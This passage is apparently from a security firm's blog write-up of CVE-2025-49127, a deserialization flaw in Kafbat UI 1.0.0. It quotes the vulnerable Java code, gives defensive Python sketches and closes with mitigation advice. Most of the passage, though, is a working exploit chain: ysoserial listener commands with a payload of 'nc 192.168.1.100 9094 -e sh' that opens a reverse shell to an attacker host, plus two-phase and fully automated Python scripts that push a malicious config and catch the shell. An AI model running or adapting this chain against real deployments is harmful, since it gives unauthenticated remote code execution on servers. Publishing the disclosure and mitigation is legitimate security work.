        sink.addAll(extractObjectMetrics(jmxMetric, msc));        // Extract individual metrics
    }
}

Jmx­Met­ric­sRe­triev­er.java – ex­trac­tO­b­ject­Met­rics method:

@SneakyThrows
private List<RawMetric> extractObjectMetrics(ObjectName objectName, MBeanServerConnection msc) {
    MBeanAttributeInfo[] attrNames = msc.getMBeanInfo(objectName).getAttributes();  // Get attribute info
    Object[] attrValues = new Object[attrNames.length];
    
    for (int i = 0; i < attrNames.length; i++) {
        attrValues[i] = msc.getAttribute(objectName, attrNames[i].getName());       // Get attribute values
        /*
         * VULNERABILITY 5: Multiple deserialization points
         * - getMBeanInfo() involves deserialization
         * - getAttribute() involves deserialization  
         * - Each call can be exploited by malicious server
         */
    }
    
    return JmxMetricsFormatter.constructMetricsList(objectName, attrNames, attrValues);
}

The attack relies on Java deserialization gadget chains: sequences of classes already on the application's classpath that can be chained together to achieve arbitrary code execution when deserialized. A common gadget chain such as CommonsCollections7 starts with a serialized object whose deserialization invokes Hashtable.readObject(), which calls Hashtable.reconstitutionPut(). The key comparison performed there reaches LazyMap.get(), followed by ChainedTransformer.transform(), and finally InvokerTransformer.transform(), which can execute arbitrary code through Runtime.exec(). The entire chain runs automatically during deserialization, without any additional user interaction.
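
The usual countermeasure is to restrict which classes a deserializer may resolve; in Java this is done with a serialization filter (java.io.ObjectInputFilter). As an analogy only, the sketch below shows the same allowlist idea with Python's pickle module, which also resolves and calls objects named in the stream. It is not the Java mechanism and not Kafbat UI code, and the names AllowlistUnpickler, safe_loads, and CallsOnLoad are made up for this illustration.

```python
import io
import os
import pickle

# Only these (module, name) pairs may be resolved while loading.
ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "set")}


class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global outside ALLOWED."""

    def find_class(self, module, name):
        if (module, name) not in ALLOWED:
            raise pickle.UnpicklingError(f"blocked global: {module}.{name}")
        return super().find_class(module, name)


def safe_loads(data: bytes):
    """Deserialize data, rejecting streams that reference non-allowlisted globals."""
    return AllowlistUnpickler(io.BytesIO(data)).load()


class CallsOnLoad:
    """Stand-in for a gadget: asks the loader to call a function during load.

    os.getcwd is used because it is harmless; the point is only that the
    stream, not the receiving code, chooses what gets called.
    """

    def __reduce__(self):
        return (os.getcwd, ())


benign = pickle.dumps({"topic": "orders", "partitions": [0, 1, 2]})
hostile = pickle.dumps(CallsOnLoad())

print(safe_loads(benign))
try:
    safe_loads(hostile)
except pickle.UnpicklingError as err:
    print("rejected:", err)
```

Plain data passes through because it never needs a global lookup, while the stream that requests a function call is rejected before anything runs.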

The SSL socket factory implementation in JmxSslSocketFactory adds another layer of complexity. Its static initialization block uses reflection to modify JVM internals: Field defaultSocketFactoryField = SslRMIClientSocketFactory.class.getDeclaredField("defaultSocketFactory"), followed by defaultSocketFactoryField.set(null, new JmxSslSocketFactory()), replaces the default SSL socket factory with a custom implementation. The custom factory allows per-connection SSL configuration through thread-local variables. It also means that connections to attacker-controlled hosts go through this custom factory, which could open additional attack vectors such as SSL certificate validation bypasses or SSL context manipulation.

JmxSslSock­et­Fac­to­ry.java – sta­t­ic ini­tial­iza­tion and cre­ate­Sock­et method:

static {
    boolean sslJmxSupported = false;
    try {
        // VULNERABILITY 6: Reflection-based modification of JVM internals
        Field defaultSocketFactoryField = SslRMIClientSocketFactory.class.getDeclaredField("defaultSocketFactory");
        defaultSocketFactoryField.setAccessible(true);
        defaultSocketFactoryField.set(null, new JmxSslSocketFactory());      // Replaces default factory
        sslJmxSupported = true;
    } catch (Exception e) {
        log.error("SSL can't be enabled for JMX retrieval. "
                + "Make sure your java app run with '--add-opens java.rmi/javax.rmi.ssl=ALL-UNNAMED' arg. Err: {}",
            e.getMessage());
        log.trace("SSL can't be enabled for JMX retrieval", e);
    }
    SSL_JMX_SUPPORTED = sslJmxSupported;
}

@Override
public Socket createSocket(String host, int port) throws IOException {
    var hostAndPort = new HostAndPort(host, port);
    
    // Check cache first
    if (CACHED_FACTORIES.containsKey(hostAndPort)) {
        return CACHED_FACTORIES.get(hostAndPort).createSocket(host, port);    // Use cached factory
    } else if (threadLocalContextSet()) {
        var factory = createFactoryFromThreadLocalCtx();                      // Create new factory
        CACHED_FACTORIES.put(hostAndPort, factory);                          // Cache it
        return factory.createSocket(host, port);                             // VULNERABLE: Connect to attacker host
    }
    return defaultSocketFactory.createSocket(host, port);                    // Fallback to default
}

The configuration structure defined in ClustersProperties makes these malicious configurations easy to construct and submit. The MetricsConfigData class accepts a type field that can be set to "JMX" to trigger the vulnerable code path, a port field that accepts any integer value for the attacker-controlled port, and optional username and password fields that can be left null so that no authentication is required. The default behavior is particularly dangerous: when a metrics block is present but its type is not specified, the setMetricsDefaults method automatically sets it to JMX through cluster.getMetrics().setType(MetricsConfig.JMX_METRICS_TYPE).

Clus­ter­sProp­er­ties.java – Met­ric­sCon­fig­Da­ta class and set­Met­rics­De­faults method:

@Data
@ToString(exclude = "password")
public static class MetricsConfigData {
    String type;                                    // ISSUE: "JMX" triggers vulnerable code
    Integer port;                                   // ISSUE: Attacker-controlled port
    Boolean ssl;
    String username;                                // Can be null (no authentication)
    String password;                                // Can be null (no authentication)
    String keystoreLocation;
    String keystorePassword;
}

private void setMetricsDefaults() {
    for (Cluster cluster : clusters) {
        if (cluster.getMetrics() != null && !StringUtils.hasText(cluster.getMetrics().getType())) {
            cluster.getMetrics().setType(MetricsConfig.JMX_METRICS_TYPE);    // DANGEROUS DEFAULT
        }
    }
}
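
One way to picture the missing validation is a check that runs before a submitted cluster definition is accepted. The sketch below is a hypothetical illustration, not the fix shipped in 1.1.0: the function names and the allowlists are assumptions, and the cluster dictionaries follow the JSON shape used in the requests shown in this article.

```python
def hosts_from_bootstrap(bootstrap_servers: str) -> list:
    """Extract host names from a comma-separated 'host:port' list."""
    hosts = []
    for entry in bootstrap_servers.split(","):
        entry = entry.strip()
        if entry:
            hosts.append(entry.rsplit(":", 1)[0])
    return hosts


def validate_cluster(cluster: dict, allowed_hosts: set, allowed_jmx_ports: set) -> list:
    """Return a list of problems; an empty list means the cluster passes."""
    problems = []
    for host in hosts_from_bootstrap(cluster.get("bootstrapServers", "")):
        if host not in allowed_hosts:
            problems.append(f"broker host not allowlisted: {host}")

    metrics = cluster.get("metrics") or {}
    # Mirror setMetricsDefaults: a metrics block without a type is treated as JMX.
    metrics_type = (metrics.get("type") or "JMX").upper()
    if metrics and metrics_type == "JMX" and metrics.get("port") not in allowed_jmx_ports:
        problems.append(f"JMX port not allowlisted: {metrics.get('port')}")
    return problems


trusted = {
    "name": "local",
    "bootstrapServers": "kafka0:29092",
    "metrics": {"type": "JMX", "port": 9997},
}
untrusted = {
    "name": "poc-initial",
    "bootstrapServers": "kafka-malicious-broker:9093",
    "metrics": {"port": 1718},  # no type given, so it defaults to JMX
}

for cluster in (trusted, untrusted):
    print(cluster["name"], validate_cluster(cluster, {"kafka0"}, {9997}))
```

An allowlist is used rather than a blocklist because the attacker chooses both the host and the port, so anything not explicitly trusted is rejected.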


The exploitation timeline shows how quickly this attack can be executed:

  • T+0: The attacker submits a malicious configuration through the /api/config endpoint.
  • T+5: The configuration has been validated and potentially persisted to disk.
  • T+30: The scheduled metrics collection process triggers automatically and initiates a JMX connection to the attacker-controlled server.
  • T+32: The RMI handshake begins.
  • T+33: The malicious JMX server sends crafted serialized objects back to the client.
  • T+34: Client-side deserialization occurs and triggers the gadget chain.
  • T+35: Arbitrary code execution is achieved.

The entire process runs without any further user interaction once the malicious configuration is submitted. Because metrics collection is scheduled, the application reconnects to the attacker-controlled server on every collection cycle for as long as the configuration remains in place, which makes the vulnerability particularly dangerous.

Ex­ploita­tion

The ex­ploita­tion process in­volves set­ting up ma­li­cious JMX servers us­ing ysose­r­i­al and trig­ger­ing the vul­ner­a­ble code path through con­fig­u­ra­tion API calls.

Step 1: Set Up Ma­li­cious JMX Serv­er for Ini­tial At­tack

First, we’ll set up a JMX serv­er that en­ables un­safe de­se­ri­al­iza­tion:

# Terminal 1: Set up JMX server to enable unsafe deserialization
java -cp ysoserial-0.0.6-all.jar ysoserial.exploit.JRMPListener 1718 ScalaProperties "org.apache.commons.collections.enableUnsafeSerialization:true"

This cre­ates a ma­li­cious JMX serv­er on port 1718 that will:

  • Ac­cept in­com­ing JMX con­nec­tions
  • Re­turn a ScalaProp­er­ties pay­load that en­ables un­safe de­se­ri­al­iza­tion
  • Set the sys­tem prop­er­ty to al­low Com­mons Col­lec­tions de­se­ri­al­iza­tion

Step 2: Trig­ger Ini­tial Ex­ploit

Now send the ma­li­cious con­fig­u­ra­tion to en­able un­safe de­se­ri­al­iza­tion:

#!/usr/bin/env python3
"""
CVE-2025-49127 Exploit - Initial Setup Phase
Enables unsafe deserialization by setting system properties
"""

import requests

# Configuration for the initial exploit
KAFBAT_UI_URL = "http://localhost:8080"
ATTACKER_HOST = "192.168.1.100"  # Replace with your host IP
JMX_PORT_INITIAL = 1718

def send_malicious_config(jmx_port, cluster_name="poc-initial"):
    """Send malicious cluster configuration to trigger JMX connection"""
    
    config_payload = {
        "config": {
            "properties": {
                "auth": {
                    "type": "DISABLED"
                },
                "rbac": {
                    "roles": []
                },
                "webclient": {},
                "kafka": {
                    "clusters": [
                        {
                            "name": "local",
                            "bootstrapServers": "kafka0:29092",
                            "schemaRegistry": "http://schema-registry0:8085",
                            "ksqldbServer": "http://ksqldb0:8088",
                            "kafkaConnect": [
                                {
                                    "name": "first",
                                    "address": "http://kafka-connect0:8083"
                                }
                            ],
                            "metrics": {
                                "type": "JMX",
                                "port": 9997
                            },
                            "properties": {},
                            "readOnly": False,
                            "audit": {
                                "topicAuditEnabled": True,
                                "consoleAuditEnabled": True,
                                "auditTopicProperties": {}
                            }
                        },
                        {
                            "name": cluster_name,
                            "bootstrapServers": "kafka-malicious-broker:9093",
                            "metrics": {
                                "type": "JMX",
                                "port": jmx_port  # Attacker-controlled port
                            },
                            "properties": {},
                            "readOnly": False
                        }
                    ]
                }
            }
        }
    }
    
    headers = {
        "Content-Type": "application/json",
        "Accept": "*/*",
        "User-Agent": "CVE-2025-49127-Exploit/1.0"
    }
    
    try:
        response = requests.put(
            f"{KAFBAT_UI_URL}/api/config",
            headers=headers,
            json=config_payload,
            timeout=30
        )
        
        print(f"[+] Request sent to {KAFBAT_UI_URL}/api/config")
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)}")
        
        if response.status_code == 200:
            print("[+] Configuration accepted - JMX connection should be triggered")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
            print(f"[-] Response: {response.text}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error sending request: {e}")

if __name__ == "__main__":
    print("[*] CVE-2025-49127 Exploitation - Phase 1: Enable Unsafe Deserialization")
    print(f"[*] Target: {KAFBAT_UI_URL}")
    print(f"[*] Attacker Host: {ATTACKER_HOST}")
    print(f"[*] JMX Port: {JMX_PORT_INITIAL}")
    print("[*] Make sure ysoserial JMX server is running on port 1718")
    print()
    
    send_malicious_config(JMX_PORT_INITIAL)

Step 3: Set Up Re­verse Shell JMX Serv­er

In a new ter­mi­nal, set up the sec­ond ma­li­cious JMX serv­er for the ac­tu­al pay­load:

# Terminal 2: Set up reverse shell listener
nc -lvv 9094

# Terminal 3: Set up JMX server with reverse shell payload
java -cp ysoserial-0.0.6-all.jar ysoserial.exploit.JRMPListener 1719 CommonsCollections7 "nc 192.168.1.100 9094 -e sh"

Step 4: Ex­e­cute Main Ex­ploit

Now ex­e­cute the main ex­ploit to get a re­verse shell:

#!/usr/bin/env python3
"""
CVE-2025-49127 Exploit - Main Exploitation Phase
Executes reverse shell payload via unsafe deserialization
"""

import requests

# Configuration for the main exploit
KAFBAT_UI_URL = "http://localhost:8080"
ATTACKER_HOST = "192.168.1.100"  # Replace with your host IP
JMX_PORT_EXPLOIT = 1719
REVERSE_SHELL_PORT = 9094

def exploit_rce():
    """Execute the main RCE exploit"""
    
    config_payload = {
        "config": {
            "properties": {
                "auth": {
                    "type": "DISABLED"
                },
                "rbac": {
                    "roles": []
                },
                "webclient": {},
                "kafka": {
                    "clusters": [
                        {
                            "name": "local",
                            "bootstrapServers": "kafka0:29092",
                            "schemaRegistry": "http://schema-registry0:8085", 
                            "ksqldbServer": "http://ksqldb0:8088",
                            "kafkaConnect": [
                                {
                                    "name": "first",
                                    "address": "http://kafka-connect0:8083"
                                }
                            ],
                            "metrics": {
                                "type": "JMX",
                                "port": 9997
                            },
                            "properties": {},
                            "readOnly": False,
                            "audit": {
                                "topicAuditEnabled": True,
                                "consoleAuditEnabled": True,
                                "auditTopicProperties": {}
                            }
                        },
                        {
                            "name": "poc-rce",
                            "bootstrapServers": "kafka-malicious-broker:9093",
                            "metrics": {
                                "type": "JMX",
                                "port": JMX_PORT_EXPLOIT  # Port with RCE payload
                            },
                            "properties": {},
                            "readOnly": False
                        }
                    ]
                }
            }
        }
    }
    
    headers = {
        "Content-Type": "application/json",
        "Accept": "*/*",
        "User-Agent": "CVE-2025-49127-Exploit/1.0"
    }
    
    try:
        print("[*] Sending RCE payload...")
        response = requests.put(
            f"{KAFBAT_UI_URL}/api/config",
            headers=headers,
            json=config_payload,
            timeout=30
        )
        
        print(f"[+] RCE payload sent")
        print(f"[+] Status Code: {response.status_code}")
        
        if response.status_code == 200:
            print("[+] Exploit successful! Check your reverse shell listener.")
        else:
            print(f"[-] Unexpected response: {response.text}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error during exploitation: {e}")

def main():
    print("[*] CVE-2025-49127 Exploitation - Phase 2: Remote Code Execution")
    print(f"[*] Target: {KAFBAT_UI_URL}")
    print(f"[*] Attacker Host: {ATTACKER_HOST}")
    print(f"[*] JMX Port: {JMX_PORT_EXPLOIT}")
    print(f"[*] Reverse Shell Port: {REVERSE_SHELL_PORT}")
    print()
    print("[!] Make sure you have:")
    print("    1. JMX server running on port 1719 with CommonsCollections7 payload")
    print("    2. Netcat listener running on port 9094")
    print("    3. Phase 1 exploit completed successfully")
    print()
    
    input("Press Enter when ready to exploit...")
    exploit_rce()

if __name__ == "__main__":
    main()

Step 5: Com­plete Au­to­mat­ed Ex­ploit

Here’s a com­plete au­to­mat­ed ex­ploit that com­bines both phas­es:

#!/usr/bin/env python3
"""
CVE-2025-49127 Complete Automated Exploit
Exploits unsafe deserialization in Kafbat UI JMX connection handling
"""

import requests
import time
import subprocess
import threading
import socket
import sys

class CVE202549127Exploit:
    def __init__(self, target_url, attacker_host, reverse_port=9094):
        self.target_url = target_url.rstrip('/')
        self.attacker_host = attacker_host
        self.reverse_port = reverse_port
        self.jmx_setup_port = 1718
        self.jmx_exploit_port = 1719
        
    def check_target_accessible(self):
        """Check if target is accessible"""
        try:
            response = requests.get(f"{self.target_url}/actuator/health", timeout=5)
            return response.status_code == 200
        except requests.exceptions.RequestException:
            return False
    
    def setup_reverse_listener(self):
        """Set up reverse shell listener"""
        def listener():
            try:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                sock.bind(('0.0.0.0', self.reverse_port))
                sock.listen(1)
                print(f"[+] Reverse shell listener started on port {self.reverse_port}")
                
                conn, addr = sock.accept()
                print(f"[+] Connection received from {addr}")
                
                while True:
                    data = conn.recv(1024)
                    if not data:
                        break
                    print(data.decode(), end='')
                    
            except Exception as e:
                print(f"[-] Error in reverse listener: {e}")
        
        thread = threading.Thread(target=listener, daemon=True)
        thread.start()
        return thread
    
    def setup_jmx_servers(self):
        """Setup malicious JMX servers using ysoserial"""
        try:
            # Setup JMX server for enabling unsafe deserialization
            setup_cmd = [
                'java', '-cp', 'ysoserial-0.0.6-all.jar',
                'ysoserial.exploit.JRMPListener',
                str(self.jmx_setup_port),
                'ScalaProperties',
                'org.apache.commons.collections.enableUnsafeSerialization:true'
            ]
            
            print(f"[*] Starting JMX setup server on port {self.jmx_setup_port}")
            setup_process = subprocess.Popen(setup_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            
            # Wait a moment for server to start
            time.sleep(2)
            
            # Setup JMX server for RCE payload
            exploit_cmd = [
                'java', '-cp', 'ysoserial-0.0.6-all.jar',
                'ysoserial.exploit.JRMPListener',
                str(self.jmx_exploit_port),
                'CommonsCollections7',
                f'nc {self.attacker_host} {self.reverse_port} -e sh'
            ]
            
            print(f"[*] Starting JMX exploit server on port {self.jmx_exploit_port}")
            exploit_process = subprocess.Popen(exploit_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            
            time.sleep(2)
            
            return setup_process, exploit_process
            
        except Exception as e:
            print(f"[-] Error setting up JMX servers: {e}")
            return None, None
    
    def send_malicious_config(self, jmx_port, cluster_name):
        """Send malicious cluster configuration"""
        config_payload = {
            "config": {
                "properties": {
                    "auth": {"type": "DISABLED"},
                    "rbac": {"roles": []},
                    "webclient": {},
                    "kafka": {
                        "clusters": [
                            {
                                "name": "local",
                                "bootstrapServers": "kafka0:29092",
                                "metrics": {"type": "JMX", "port": 9997},
                                "properties": {},
                                "readOnly": False
                            },
                            {
                                "name": cluster_name,
                                "bootstrapServers": "kafka-malicious-broker:9093",
                                "metrics": {
                                    "type": "JMX",
                                    "port": jmx_port
                                },
                                "properties": {},
                                "readOnly": False
                            }
                        ]
                    }
                }
            }
        }
        
        headers = {
            "Content-Type": "application/json",
            "Accept": "*/*",
            "User-Agent": "CVE-2025-49127-Exploit/1.0"
        }
        
        try:
            response = requests.put(
                f"{self.target_url}/api/config",
                headers=headers,
                json=config_payload,
                timeout=30
            )
            
            return response.status_code == 200
            
        except Exception as e:
            print(f"[-] Error sending configuration: {e}")
            return False
    
    def exploit(self):
        """Execute the complete exploit"""
        print("=" * 60)
        print("CVE-2025-49127 Kafbat UI RCE Exploit")
        print("=" * 60)
        print(f"Target: {self.target_url}")
        print(f"Attacker Host: {self.attacker_host}")
        print(f"Reverse Shell Port: {self.reverse_port}")
        print("=" * 60)
        
        # Check target accessibility
        print("[*] Checking target accessibility...")
        if not self.check_target_accessible():
            print("[-] Target not accessible. Please check the URL and network connectivity.")
            return False
        print("[+] Target is accessible")
        
        # Setup reverse shell listener
        print("[*] Setting up reverse shell listener...")
        listener_thread = self.setup_reverse_listener()
        time.sleep(1)
        
        # Setup JMX servers
        print("[*] Setting up malicious JMX servers...")
        setup_proc, exploit_proc = self.setup_jmx_servers()
        if not setup_proc or not exploit_proc:
            print("[-] Failed to setup JMX servers")
            return False
        print("[+] JMX servers ready")
        
        # Phase 1: Enable unsafe deserialization
        print("[*] Phase 1: Enabling unsafe deserialization...")
        if self.send_malicious_config(self.jmx_setup_port, "poc-setup"):
            print("[+] Phase 1 successful")
        else:
            print("[-] Phase 1 failed")
            return False
        
        time.sleep(3)
        
        # Phase 2: Execute RCE payload
        print("[*] Phase 2: Executing RCE payload...")
        if self.send_malicious_config(self.jmx_exploit_port, "poc-rce"):
            print("[+] RCE payload sent successfully!")
            print("[+] Check your reverse shell listener for incoming connection...")
            print("[*] If successful, you should have a shell connection")
        else:
            print("[-] Failed to send RCE payload")
            return False
        
        # Keep processes alive for a while
        print("[*] Keeping exploit servers alive for 60 seconds...")
        time.sleep(60)
        
        # Cleanup
        try:
            setup_proc.terminate()
            exploit_proc.terminate()
        except Exception:
            pass
        
        return True

def main():
    if len(sys.argv) != 3:
        print("Usage: python3 exploit.py <target_url> <attacker_ip>")
        print("Example: python3 exploit.py http://localhost:8080 192.168.1.100")
        sys.exit(1)
    
    target_url = sys.argv[1]
    attacker_host = sys.argv[2]
    
    exploit = CVE202549127Exploit(target_url, attacker_host)
    success = exploit.exploit()
    
    if success:
        print("\n[+] Exploit completed successfully!")
    else:
        print("\n[-] Exploit failed!")

if __name__ == "__main__":
    main()

Us­age Ex­am­ple

# Make sure ysoserial is in the current directory
ls -la ysoserial-0.0.6-all.jar
# Run the complete exploit
python3 exploit.py http://localhost:8080 192.168.1.100

# Expected output (abridged):
# [+] Target is accessible
# [+] JMX servers ready  
# [+] Phase 1 successful
# [+] RCE payload sent successfully!
# [+] Check your reverse shell listener for incoming connection...

Mit­i­ga­tion

To pro­tect against CVE-2025-49127 and sim­i­lar vul­ner­a­bil­i­ties, im­ple­ment the fol­low­ing se­cu­ri­ty mea­sures:

Up­grade to Fixed Ver­sion:

# Update to Kafbat UI version 1.1.0 or later
docker pull ghcr.io/kafbat/kafka-ui:v1.1.0

Dis­able Dy­nam­ic Con­fig­u­ra­tion:

# In docker-compose.yml or application configuration
environment:
  DYNAMIC_CONFIG_ENABLED: 'false'
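
Both mitigations can be checked mechanically across deployments. The sketch below is a hypothetical audit helper, not an official tool: the function names are made up, the image reference and environment mapping are expected to come from your own deployment manifest, and treating an unset DYNAMIC_CONFIG_ENABLED as disabled is an assumption to verify against your version.

```python
FIXED_VERSION = (1, 1, 0)


def parse_version(tag: str):
    """Turn 'v1.1.0' into (1, 1, 0); return None for tags such as 'latest'."""
    parts = tag.lstrip("v").split(".")
    if len(parts) != 3 or not all(part.isdigit() for part in parts):
        return None
    return tuple(int(part) for part in parts)


def audit_deployment(image: str, environment: dict) -> list:
    """Return findings for a Kafbat UI deployment; an empty list means none."""
    findings = []
    tag = image.rpartition(":")[2]  # text after the last ':' in the image reference
    version = parse_version(tag)
    if version is None:
        findings.append(f"cannot determine version from image reference: {image}")
    elif version < FIXED_VERSION:
        findings.append(f"image {image} predates fixed version 1.1.0")

    # Assumption: an unset variable means dynamic configuration is disabled.
    if str(environment.get("DYNAMIC_CONFIG_ENABLED", "false")).lower() == "true":
        findings.append("DYNAMIC_CONFIG_ENABLED is true")
    return findings


vulnerable = audit_deployment(
    "ghcr.io/kafbat/kafka-ui:v1.0.0", {"DYNAMIC_CONFIG_ENABLED": "true"}
)
hardened = audit_deployment(
    "ghcr.io/kafbat/kafka-ui:v1.1.0", {"DYNAMIC_CONFIG_ENABLED": "false"}
)
print(vulnerable)
print(hardened)
```

Floating tags such as latest are reported as undeterminable rather than assumed safe, since the tag alone does not reveal which release is running.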

Con­clu­sion

CVE-2025-49127 represents a critical security vulnerability in Kafbat UI 1.0.0 that demonstrates the dangers of unsafe deserialization in Java applications. The vulnerability stems from the application's dynamic configuration feature, which allows unauthenticated users to specify arbitrary JMX endpoints without proper validation. When the application attempts to connect to these attacker-controlled JMX services, it becomes susceptible to Java deserialization attacks that can lead to complete system compromise.

The vulnerability highlights several critical security principles that were violated in the original implementation: lack of input validation, absence of authentication requirements for sensitive operations, unsafe handling of external connections, and insufficient sandboxing of deserialization processes. The attack vector is particularly dangerous because it requires no authentication and can be exploited remotely through a simple HTTP request to the configuration API.

Organizations using Kafbat UI should immediately upgrade to version 1.1.0 or later, implement proper authentication and authorization controls, and establish network segmentation to limit the blast radius of potential attacks. Additionally, implementing comprehensive monitoring and detection capabilities will help identify and respond to exploitation attempts. This vulnerability serves as a reminder of the importance of secure-by-default design principles and the need for thorough security testing of dynamic configuration features in enterprise applications.

For expert guidance on vulnerability management and/or penetration testing services contact SecureLayer7 to leverage tailored solutions and stay ahead of evolving security risks.
